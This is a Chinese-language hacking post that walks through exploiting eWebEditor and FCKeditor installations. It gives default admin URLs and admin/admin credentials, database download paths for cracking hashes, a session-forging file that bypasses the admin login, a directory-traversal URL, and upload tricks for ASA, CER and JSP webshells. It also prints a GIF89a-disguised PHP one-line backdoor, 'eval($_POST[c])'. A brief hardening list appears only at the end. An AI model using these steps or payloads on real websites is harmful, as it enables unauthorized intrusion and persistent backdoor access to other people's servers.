ewebeditor 是基于浏览器的、所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件（如：Word）所具有的强大可视编辑功能。WEB开发人员可以用她把传统的多行文本输入框<TEXTAREA>替换为可视化的富文本输入框，使最终用户可以可视化的发布HTML格式的网页内容。 eWebEditor!已基本成为网站内容管理发布的必备工具！

如果有兴趣的话去官方了解详情：http://www.ewebeditor.net/

先说重点吧，这个编辑器按脚本分主要有3个版本，ASP/ASPX/PHP/ 每个版本都可以利用的

先说下FCKeditor的:

/admin/FCKeditor/editor/filemanager/browser/default/browser.html?type=image&connector=connectors/asp/connector.asp

可建目录。

ASP版:

这个版本其实个人感觉是影响最大，使用最多的一个了吧，早期很多asp站都用这个，当然现在也是大量的存在的。。。

怎么利用呢？一般用这个的默认后台的URL都是默认的：

www.xxx.com/admin/ewebeditor/admin_login.asp

而且账户和密码也基本都是默认的：admin admin

对于找这个路径还有个简单的方法，就是在他站上新闻或者其他板块上找图片，看图片的URL也是可以找到的，不明白的自己试下就知道了

还有如果默认的账户和密码修改了，我们可以下载他的数据库，然后本地破解MD5了

默认数据库：

.../db/ewebeditor.mdb 或者 .../db/ewebeditor.asp

一般下载数据库后打开察看就可以了，然后后台登陆，新加样式。。。上传ASA马。。。

有的站数据库设置了只读属性，这样的站你是无法新加样式的，这样的站你可以看他数据库里的样式设置情况，一般很多时候都是让人给拿过的，而且明显的asa在那里。。。呵呵，这样的话就可以直接构造一个调用这个样式的连接来上传shell

比如发现数据库里有样式123 他设置的是可以上传asa的话

那么就可以这样调用：

http://www.xxx.com/eWeb/eWebEditor.asp?id=contentCN&style=123

这样就可以直接上传了，然后在点“编辑”就会找到shell的路径了

其实这个漏洞主要是upload.asp的过滤不严造成的，新版的应该都修复了，具体受影响的版本我也没统计过

另外在公布另外一个ewebeditor的漏洞

漏洞文件:Admin_Private.asp
漏洞语句:

<% 
If Session("eWebEditor_User") = "" Then
Response.Redirect "admin_login.asp"
Response.End
End If

只判断了session，没有判断cookies和路径的验证问题。
漏洞利用:
新建一个mrchen.asp内容如下:

<%Session("eWebEditor_User") = "11111111"%> 

访问mrchen.asp，再访问后台任何文件，for example:Admin_Default.asp

这个拿shell的方法就简单了，不详细说了

ASPX版：

受影响文件：eWebEditorNet/upload.aspx

利用方法：添好本地的cer的Shell文件。在浏揽器输入javascript:lbtnUpload.click();就能得到shell,具体大家自己尝试，不明白的联系我，或者留言

/ftb.imagegallery.aspx?frame=1&rif=..&cif=\..\..\..\..\..\..\..  可以浏览目录。

PHP版

关于eWebEditor 漏洞php版本的和asp的一样。有目录浏览。和编辑扩展名。重点在于虽然支持了php格式但上传还是上传不了。不过利用织梦的gif89a漏洞倒可以实现php一句话上传，然后再上传webshell。

备注：织梦的gif89a漏洞，准确来说应该是DEDECMS中所用的php版的FCKeditor存在上传漏洞，gif89a文件头欺骗。DEDECMS中在上传拖上没有对picSubmit进行任何处理。但是却不能直接上传php马。因为会识别。使用修改过的php小马。

gif89a

<?php 
phpinfo(); 
?>

RFI

gif89a 
<?php eval($_POST[c]);?>

利用gif89a进行了欺骗。现在上传就可以成功了.然后有php一句话客户端连接.

JSP版
上传漏洞

影响版本：漏洞存在于ewebeditor jsp版 1.4以下版本，漏洞有两个版本。

原理：第一个是使用savefile.jsp来进行文件上传操作的，从代码中可以看出，程序并没做任何上传过滤，这样我们就可以直接上传一个JSPShell了。另一个版本可能是被人修改过，把代码转成了servlet，不能看到代码，但是利用方法却大同小异。

利用方法：我们先找一个1.4版本以下的ewebeditor JSP上传页面，选择好一个JSPShell。这个ewebeditor是没有提交按钮的，所以这里涉及到一个小技巧，就是在上传的对话框中敲下回车，大约过半分钟，就可以查看网页的源文件来寻找我们的Webshell了。
解决方法

1.修改admin密码；

2.upload.asp中的：

“任何情況下都不允许上传asp脚本文件sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)

改为：

“任何情況下都不允许上传asp脚本文件

sAllowExt = Replace(UCase(sAllowExt), "ASP", "") 
sAllowExt = Replace(UCase(sAllowExt), "ASA", "") 
sAllowExt = Replace(UCase(sAllowExt), "CER", "") 
sAllowExt = Replace(UCase(sAllowExt), "AASPSP", "")
sAllowExt = Replace(UCase(sAllowExt), "CDX", "") 
sAllowExt = Replace(UCase(sAllowExt), "HTR", "")

3. Admin_Private.asp：

If Session("eWebEditor_User") = "" Then
Response. Redirect "admin_login.asp"
Response. End
End If

改为：

If Session("eWebEditor_User") = "" and IsSelfRefer() Then
Response.Redirect "admin_login.asp"
Response.End
End If

4.将db/ewebeditor.mdb数据库文件名改为其他包含#等字符的文件名；

5. 将IIS中的“应用文件映射”中的“asp”删除；

6. 仍有问题删除admin_login.asp文件。